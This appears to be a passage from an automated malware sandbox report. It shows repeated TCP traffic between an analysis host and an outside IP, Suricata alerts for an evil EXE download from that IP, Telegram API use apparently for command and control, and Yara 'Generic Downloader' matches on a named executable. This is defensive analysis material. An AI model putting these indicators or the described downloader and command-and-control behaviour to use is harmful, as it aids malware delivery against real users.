                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 87.120.84.38:80 -> 192.168.2.22:49161
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPE
